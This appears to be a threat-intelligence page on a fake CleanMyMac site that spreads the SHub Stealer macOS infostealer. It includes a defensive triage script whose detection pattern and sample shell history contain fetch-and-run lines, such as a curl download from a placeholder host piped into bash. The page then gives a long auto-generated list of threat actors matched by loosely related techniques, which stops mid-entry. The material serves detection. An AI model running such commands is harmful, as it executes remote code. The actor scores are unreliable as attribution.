Trusted Design

Fake CleanMyMac site installs SHub Stealer and backdoors crypto wallets

Summary

A deceptive website impersonating CleanMyMac delivers SHub Stealer, a sophisticated macOS infostealer. The infection chain starts with the victim pasting a command into Terminal; that command downloads and executes a malicious script, so the payload is fetched and run from the shell and never passes through the Gatekeeper checks that a downloaded app would. Once running, the malware collects passwords, browser data from a range of browsers, cryptocurrency wallet data and Telegram sessions. It also modifies certain crypto wallet apps, both to capture recovery phrases and to plant persistent backdoors inside the wallet apps themselves. SHub Stealer belongs to a growing family of AppleScript-based macOS infostealers, and its wallet tampering shows the increasing sophistication of attacks aimed at Mac users.
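As an added example, not part of this pulse or of the SHub Stealer report it summarizes, the following POSIX shell script covers the two host-side checks the chain above calls for: finding the pasted fetch-and-run command in the victim's shell history, and detecting a tampered wallet app bundle by comparing it with a hash baseline (and, on macOS, with codesign). It assumes nothing about the real one-liner, domains or affected wallet products, none of which this page lists; the history lines, the URL and the Wallet.app bundle in the demo are constructed stand-ins.

```shell
#!/bin/sh
# Added triage helper (not from the original page or from the SHub Stealer
# report it summarizes). ASSUMPTIONS: the real one-liner and the affected wallet
# apps are not given here, so the history check matches the generic shape of a
# pasted fetch-and-run command, and the bundle check is a hash baseline you
# take while the wallet app is known-good. All sample data below is constructed.

# Print shell-history lines shaped like a pasted "download and execute":
# a curl/wget fetch piped into a shell, an inline osascript, or a base64 blob
# decoded into a pipe. zsh's extended-history prefix ": <epoch>:<secs>;" is
# stripped first so the pattern sees the command itself.
scan_history() {
    sed 's/^: [0-9]*:[0-9]*;//' "$1" |
        grep -E '(curl|wget)[^|]*[|][[:space:]]*(ba|z)?sh([[:space:]]|$)|osascript[[:space:]]+-e|base64[[:space:]]+(-d|-D|--decode)[^|]*[|]'
}

# Write a constructed history file: two ordinary commands and two that match.
# The URL is a placeholder, not an indicator from the report.
write_sample_history() {
    cat > "$1" <<'EOF'
ls -la ~/Downloads
: 1741500000:0;curl -fsSL https://example.invalid/install.sh | bash
brew update
echo aGVsbG8= | base64 -d | sh
EOF
}

# Hash every regular file under a directory (an .app bundle) in a stable order.
# For Electron wallets the interesting file is Contents/Resources/app.asar:
# a stealer that patches the wallet to capture the recovery phrase changes it.
hash_tree() {
    ( cd "$1" && find . -type f | LC_ALL=C sort | while IFS= read -r f; do
        if command -v sha256sum >/dev/null 2>&1; then
            sha256sum "$f"
        else
            shasum -a 256 "$f"   # macOS ships shasum, not sha256sum
        fi
    done )
}

# List paths whose hash differs from a baseline produced by hash_tree.
# usage: diff_tree DIR BASELINE_FILE
diff_tree() {
    hash_tree "$1" | diff "$2" - | grep '^[<>]' | awk '{print $NF}' | sort -u
}

# On macOS, also let the OS judge the bundle: a patched app fails strict
# signature verification. Skipped where codesign does not exist (e.g. Linux).
verify_signature() {
    if command -v codesign >/dev/null 2>&1; then
        codesign --verify --deep --strict "$1" && echo "$1: signature intact"
    else
        echo "codesign unavailable; rely on the hash baseline"
    fi
}

# Demonstration on constructed data: flag the pasted commands, then baseline a
# fake wallet bundle, tamper with its packed app code and show what changed.
demo() {
    tmp=$(mktemp -d)
    write_sample_history "$tmp/zsh_history"
    echo "== history lines shaped like a pasted fetch-and-run =="
    scan_history "$tmp/zsh_history"

    mkdir -p "$tmp/Wallet.app/Contents/Resources"
    printf 'original app code' > "$tmp/Wallet.app/Contents/Resources/app.asar"
    printf 'plist' > "$tmp/Wallet.app/Contents/Info.plist"
    hash_tree "$tmp/Wallet.app" > "$tmp/baseline"
    printf 'patched code that exfiltrates the seed phrase' > "$tmp/Wallet.app/Contents/Resources/app.asar"
    echo "== files changed since baseline =="
    diff_tree "$tmp/Wallet.app" "$tmp/baseline"
    verify_signature "$tmp/Wallet.app"
    rm -rf "$tmp"
}

demo
```

Run it as `sh triage.sh` to see the demo. In practice, take the hash_tree baseline right after installing or updating a wallet app and re-run diff_tree when a compromise is suspected: a changed app.asar, or a codesign failure, is the concrete signal that a wallet app has been modified rather than merely read. Shell history only records the pasted command if the user's shell wrote history for that session, so treat an empty scan_history result as inconclusive, not as a clean bill of health.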

Created: 2026-03-09

Indicators

Similar Pulses

No similar pulses were found.

Threat actors related to this pulse (fact-based)

APT38

Score: 19.19
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1566.001 - Spearphishing Attachment
  • T1059.010 - AutoHotKey & AutoIT
  • T1009 - Binary Padding
  • T1218.012 - Verclsid
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries

Moonstone Sleet

Score: 12.78
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1606.002 - SAML Tokens
  • T1566.002 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1027 - Obfuscated Files or Information
  • T1547.013 - XDG Autostart Entries

FIN8

Score: 6.96
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1547.013 - XDG Autostart Entries

Ke3chang

Score: 19.21
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1027.008 - Stripped Payloads
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1547.013 - XDG Autostart Entries

FIN7

Score: 33.06
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1546.013 - PowerShell Profile
  • T1606.002 - SAML Tokens
  • T1115 - Clipboard Data
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1009 - Binary Padding
  • T1011.001 - Exfiltration Over Bluetooth
  • T1218.012 - Verclsid
  • T1584.005 - Botnet
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1553.004 - Install Root Certificate
  • T1547.013 - XDG Autostart Entries

HAFNIUM

Score: 6.19
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1027.008 - Stripped Payloads
  • T1547.013 - XDG Autostart Entries

Winter Vivern

Score: 15.43
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1546.013 - PowerShell Profile
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1087.004 - Cloud Account
  • T1218.001 - Compiled HTML File
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries

APT19

Score: 10.89
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1059.010 - AutoHotKey & AutoIT
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1553.004 - Install Root Certificate
  • T1059.012 - Hypervisor CLI

FIN10

Score: 3.84
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking

APT32

Score: 32.87
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1597.002 - Purchase Technical Data
  • T1546.013 - PowerShell Profile
  • T1566.002 - Spearphishing Link
  • T1115 - Clipboard Data
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1218.012 - Verclsid
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1218.010 - Regsvr32
  • T1553.004 - Install Root Certificate
  • T1059.012 - Hypervisor CLI
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries

APT39

Score: 22.75
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1597.002 - Purchase Technical Data
  • T1566.001 - Spearphishing Attachment
  • T1499.002 - Service Exhaustion Flood
  • T1059.010 - AutoHotKey & AutoIT
  • T1050 - New Service
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1547.013 - XDG Autostart Entries

APT37

Score: 7.66
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1562.012 - Disable or Modify Linux Audit System
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries

Lazarus Group

Score: 31.59
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1071.004 - DNS
  • T1606.002 - SAML Tokens
  • T1059.010 - AutoHotKey & AutoIT
  • T1070.008 - Clear Mailbox Data
  • T1050 - New Service
  • T1009 - Binary Padding
  • T1218.012 - Verclsid
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries

Tropic Trooper

Score: 9.03
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1059.010 - AutoHotKey & AutoIT
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries

Threat Group-3390

Score: 17.04
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1584.008 - Network Devices
  • T1115 - Clipboard Data
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries

Earth Lusca

Score: 20.64
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1546.013 - PowerShell Profile
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1199 - Trusted Relationship
  • T1218.001 - Compiled HTML File
  • T1059.012 - Hypervisor CLI

Magic Hound

Score: 23.35
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1566.002 - Spearphishing Link
  • T1036.009 - Break Process Trees
  • T1009 - Binary Padding
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1683 - Generate Content
  • T1553.004 - Install Root Certificate
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries

ZIRCONIUM

Score: 12.58
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1566.002 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.012 - Disable or Modify Linux Audit System
  • T1087.004 - Cloud Account
  • T1547.013 - XDG Autostart Entries

Chimera

Score: 23.05
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1003.007 - Proc Filesystem
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1542.004 - ROMMONkit
  • T1157 - Dylib Hijacking
  • T1574 - Hijack Execution Flow
  • T1132.002 - Non-Standard Encoding
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries

Patchwork

Score: 10.96
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1566.002 - Spearphishing Link
  • T1562.012 - Disable or Modify Linux Audit System
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries

Stealth Falcon

Score: 5.59
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1562.012 - Disable or Modify Linux Audit System
  • T1087.004 - Cloud Account

Volt Typhoon

Score: 23.28
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1567 - Exfiltration Over Web Service
  • T1070.008 - Clear Mailbox Data
  • T1562.012 - Disable or Modify Linux Audit System
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1488 - Disk Content Wipe
  • T1547.013 - XDG Autostart Entries

LuminousMoth

Score: 18.57
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1606.002 - SAML Tokens
  • T1115 - Clipboard Data
  • T1091 - Replication Through Removable Media
  • T1136.002 - Domain Account
  • T1584.005 - Botnet
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries

Aquatic Panda

Score: 12.72
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1003.007 - Proc Filesystem
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries

Gamaredon Group

Score: 33.68
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1552.005 - Cloud Instance Metadata API
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1218.012 - Verclsid
  • T1087.004 - Cloud Account
  • T1055.014 - VDSO Hijacking
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1061 - Graphical User Interface
  • T1542.004 - ROMMONkit
  • T1059.013 - Container CLI/API
  • T1553.004 - Install Root Certificate
  • T1547.013 - XDG Autostart Entries

GALLIUM

Score: 11.93
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1584.008 - Network Devices
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries

Wizard Spider

Score: 21.55
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1584.008 - Network Devices
  • T1038 - DLL Search Order Hijacking
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
  • T1204.001 - Malicious Link

APT41

Score: 30.10
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1499.001 - OS Exhaustion Flood
  • T1584.008 - Network Devices
  • T1071.004 - DNS
  • T1562.012 - Disable or Modify Linux Audit System
  • T1177 - LSASS Driver
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1218.010 - Regsvr32
  • T1564.003 - Hidden Window
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries

OilRig

Score: 32.86
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1552.005 - Cloud Instance Metadata API
  • T1606.002 - SAML Tokens
  • T1566.001 - Spearphishing Attachment
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1009 - Binary Padding
  • T1562.012 - Disable or Modify Linux Audit System
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1592.002 - Software
  • T1547.013 - XDG Autostart Entries

HEXANE

Score: 14.69
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1499.003 - Application Exhaustion Flood
  • T1091 - Replication Through Removable Media
  • T1562.012 - Disable or Modify Linux Audit System
  • T1055.014 - VDSO Hijacking
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries

Windshift

Score: 6.30
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1558 - Steal or Forge Kerberos Tickets
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries

MuddyWater

Score: 24.15
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1546.013 - PowerShell Profile
  • T1059.010 - AutoHotKey & AutoIT
  • T1518.002 - Backup Software Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1218.012 - Verclsid
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32
  • T1059.013 - Container CLI/API
  • T1547.013 - XDG Autostart Entries

Dragonfly

Score: 18.30
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1584.008 - Network Devices
  • T1566.002 - Spearphishing Link
  • T1115 - Clipboard Data
  • T1009 - Binary Padding
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries

Medusa Group

Score: 19.30
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1009 - Binary Padding
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1553.004 - Install Root Certificate
  • T1547.013 - XDG Autostart Entries
  • T1204.001 - Malicious Link

Sandworm Team

Score: 30.58
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1606.002 - SAML Tokens
  • T1566.002 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.012 - Disable or Modify Linux Audit System
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1218.010 - Regsvr32
  • T1075 - Pass the Hash
  • T1547.013 - XDG Autostart Entries
  • T1204.001 - Malicious Link

Storm-1811

Score: 9.29
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1547.013 - XDG Autostart Entries

Sidewinder

Score: 10.61
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1546.013 - PowerShell Profile
  • T1566.002 - Spearphishing Link
  • T1218.012 - Verclsid
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries

APT3

Score: 13.55
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1562.012 - Disable or Modify Linux Audit System
  • T1177 - LSASS Driver
  • T1087.004 - Cloud Account
  • T1218.010 - Regsvr32
  • T1553.004 - Install Root Certificate
  • T1547.013 - XDG Autostart Entries

Ember Bear

Score: 19.31
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1584.008 - Network Devices
  • T1558 - Steal or Forge Kerberos Tickets
  • T1136.002 - Domain Account
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32
  • T1656 - Impersonation
  • T1668 - Exclusive Control

Poseidon Group

Score: 5.12
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1003.007 - Proc Filesystem

Mustang Panda

Score: 20.09
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1546.013 - PowerShell Profile
  • T1606.002 - SAML Tokens
  • T1566.002 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1218.012 - Verclsid
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries

Tonto Team

Score: 4.86
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries

Suckfly

Score: 4.02
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1157 - Dylib Hijacking

BlackByte

Score: 24.20
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1009 - Binary Padding
  • T1134.001 - Token Impersonation/Theft
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1547.013 - XDG Autostart Entries
  • T1204.001 - Malicious Link

APT28

Score: 34.04
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1499.001 - OS Exhaustion Flood
  • T1071.004 - DNS
  • T1552.005 - Cloud Instance Metadata API
  • T1566.002 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1542.004 - ROMMONkit
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1553.004 - Install Root Certificate
  • T1059.012 - Hypervisor CLI
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries

Sowbug

Score: 5.63
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1542.004 - ROMMONkit

Storm-0501

Score: 21.46
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1552.003 - Shell History
  • T1218.005 - Mshta
  • T1027 - Obfuscated Files or Information
  • T1027.014 - Polymorphic Code
  • T1204.001 - Malicious Link

Axiom

Score: 18.94
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1499.003 - Application Exhaustion Flood
  • T1177 - LSASS Driver
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1160 - Launch Daemon

Leviathan

Score: 25.43
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1059.010 - AutoHotKey & AutoIT
  • T1050 - New Service
  • T1087.004 - Cloud Account
  • T1055.014 - VDSO Hijacking
  • T1157 - Dylib Hijacking
  • T1027.014 - Polymorphic Code
  • T1488 - Disk Content Wipe
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries

Contagious Interview

Score: 36.27
Matched TTPs:
  • T1044 - File System Permissions Weakness
  • T1546.013 - PowerShell Profile
  • T1606.002 - SAML Tokens
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1552.003 - Shell History
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1690 - Prevent Command History Logging
  • T1656 - Impersonation
  • T1059.006 - Python
  • T1221 - Template Injection

Winnti Group

Score: 4.06
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1547.013 - XDG Autostart Entries

Rocke

Score: 16.83
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1036.009 - Break Process Trees
  • T1059.010 - AutoHotKey & AutoIT
  • T1009 - Binary Padding
  • T1597 - Search Closed Sources
  • T1059.013 - Container CLI/API
  • T1547.013 - XDG Autostart Entries

TeamTNT

Score: 26.12
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1606.002 - SAML Tokens
  • T1003.007 - Proc Filesystem
  • T1036.009 - Break Process Trees
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1009 - Binary Padding
  • T1142 - Keychain
  • T1597 - Search Closed Sources
  • T1547.013 - XDG Autostart Entries

UNC3886

Score: 23.28
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1606.002 - SAML Tokens
  • T1009 - Binary Padding
  • T1585.002 - Email Accounts
  • T1136.002 - Domain Account
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1488 - Disk Content Wipe
  • T1218.010 - Regsvr32

Turla

Score: 23.05
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1552.005 - Cloud Instance Metadata API
  • T1606.002 - SAML Tokens
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1218.001 - Compiled HTML File
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries

Saint Bear

Score: 7.24
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1091 - Replication Through Removable Media
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32

FIN6

Score: 11.94
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1562.012 - Disable or Modify Linux Audit System
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1505 - Server Software Component

Silence

Score: 5.02
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1547.013 - XDG Autostart Entries

LazyScripter

Score: 11.71
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1547.013 - XDG Autostart Entries

TA505

Score: 15.79
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1562.012 - Disable or Modify Linux Audit System
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1547.013 - XDG Autostart Entries

Cobalt Group

Score: 11.97
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1518.002 - Backup Software Discovery
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries

Higaisa

Score: 13.94
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1059.010 - AutoHotKey & AutoIT
  • T1569.003 - Systemctl
  • T1087.004 - Cloud Account
  • T1218.010 - Regsvr32
  • T1553.004 - Install Root Certificate

Kimsuky

Score: 49.66
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1606.002 - SAML Tokens
  • T1566.002 - Spearphishing Link
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1009 - Binary Padding
  • T1562.012 - Disable or Modify Linux Audit System
  • T1218.012 - Verclsid
  • T1552.003 - Shell History
  • T1087.004 - Cloud Account
  • T1055.014 - VDSO Hijacking
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1027.014 - Polymorphic Code
  • T1690 - Prevent Command History Logging
  • T1553.004 - Install Root Certificate
  • T1656 - Impersonation
  • T1132.002 - Non-Standard Encoding
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries

Indrik Spider

Score: 12.93
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1606.002 - SAML Tokens
  • T1003.007 - Proc Filesystem
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1547.013 - XDG Autostart Entries

Molerats

Score: 6.37
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1059.010 - AutoHotKey & AutoIT
  • T1562.012 - Disable or Modify Linux Audit System
  • T1547.013 - XDG Autostart Entries

Leafminer

Score: 11.18
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1562.012 - Disable or Modify Linux Audit System
  • T1101 - Security Support Provider
  • T1199 - Trusted Relationship
  • T1059.012 - Hypervisor CLI

Star Blizzard

Score: 8.68
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1566.002 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking

Daggerfly

Score: 5.13
Matched TTPs:
  • T1584.008 - Network Devices
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries

APT29

Score: 22.32
Matched TTPs:
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1177 - LSASS Driver
  • T1218.012 - Verclsid
  • T1218.005 - Mshta
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries

FIN13

Score: 24.01
Matched TTPs:
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1552.003 - Shell History
  • T1134.001 - Token Impersonation/Theft
  • T1199 - Trusted Relationship
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
  • T1686.001 - Cloud Firewall

Agrius

Score: 10.12
Matched TTPs:
  • T1584.008 - Network Devices
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources

APT5

Score: 6.44
Matched TTPs:
  • T1584.008 - Network Devices
  • T1027.008 - Stripped Payloads

menuPass

Score: 12.43
Matched TTPs:
  • T1584.008 - Network Devices
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1542.004 - ROMMONkit
  • T1157 - Dylib Hijacking
  • T1547.013 - XDG Autostart Entries

Sea Turtle

Score: 11.23
Matched TTPs:
  • T1499.003 - Application Exhaustion Flood
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1059.013 - Container CLI/API

Salt Typhoon

Score: 9.82
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1608.002 - Upload Tool
  • T1009 - Binary Padding
  • T1199 - Trusted Relationship

Play

Score: 13.60
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1552.003 - Shell History
  • T1142 - Keychain
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1547.013 - XDG Autostart Entries

Aoqin Dragon

Score: 6.62
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32

RedCurl

Score: 11.32
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1562.012 - Disable or Modify Linux Audit System
  • T1574.010 - Services File Permissions Weakness
  • T1542.004 - ROMMONkit

Moses Staff

